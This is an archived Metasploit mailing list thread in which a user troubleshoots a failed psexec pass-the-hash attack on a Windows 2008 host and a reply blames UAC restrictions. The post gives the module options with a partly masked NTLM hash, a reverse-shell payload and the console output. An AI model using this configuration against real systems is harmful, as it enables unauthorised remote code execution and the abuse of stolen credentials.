Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: psexec

From: Enis Sahin <enis.c.sahin () gmail com>
Date: Thu, 20 Oct 2011 08:54:56 +0300
Could be because "Vista/Win7/2008 with UAC drops admin privs on SMB
shares for local users, which prevents the psexec module from writing
it's executable/service to the remote host when using a local admin
credential."

Source: http://dev.metasploit.com/redmine/issues/5316

Enis

On 19/10/2011, audio audience <audience099 () gmail com> wrote:

Hello All,
I have a remote system. This running win2k8 x86 system and i have all users
hash.
However, i ran psexec exploit but it's couldn't successfully.

- Disabled antivirus
- Checked regedit key :  "RequireSecuritySignature" to "0".
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash

Do you have any idea this jobs ?..

msf  exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting
     Required  Description
   ----       ---------------
     --------  -----------
   RHOST      [IP Address]
    yes       The
target address
   RPORT      445
     yes       Set
the SMB service port
   SHARE      ADMIN$
    yes       The
share to connect to, can be an admin share (ADMIN$,C$,...) or a normal
read/write folder share
   SMBDomain  WORKGROUP
     no        The
Windows domain to use for authentication
   SMBPass    aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798
 no        The
password for the specified username
   SMBUser    Administrator
     no        The
username to authenticate as


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     0.0.0.0          yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(psexec) > exploit

[*] Started reverse handler on 0.0.0.0:4443
[*] Connecting to the server...
[*] Authenticating to [IP Address]:445|WORKGROUP as user
'Administrator'...
[*] Uploading payload...
[*] Created \uqSjtJEP.exe...
[*] Binding to
367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl]
...
[*] Bound to
367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \uqSjtJEP.exe...
[*] Exploit completed, but no session was created.
msf  exploit(psexec) >




-- 
http://www.enissahin.com | http://twitter.com/enis_sahin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: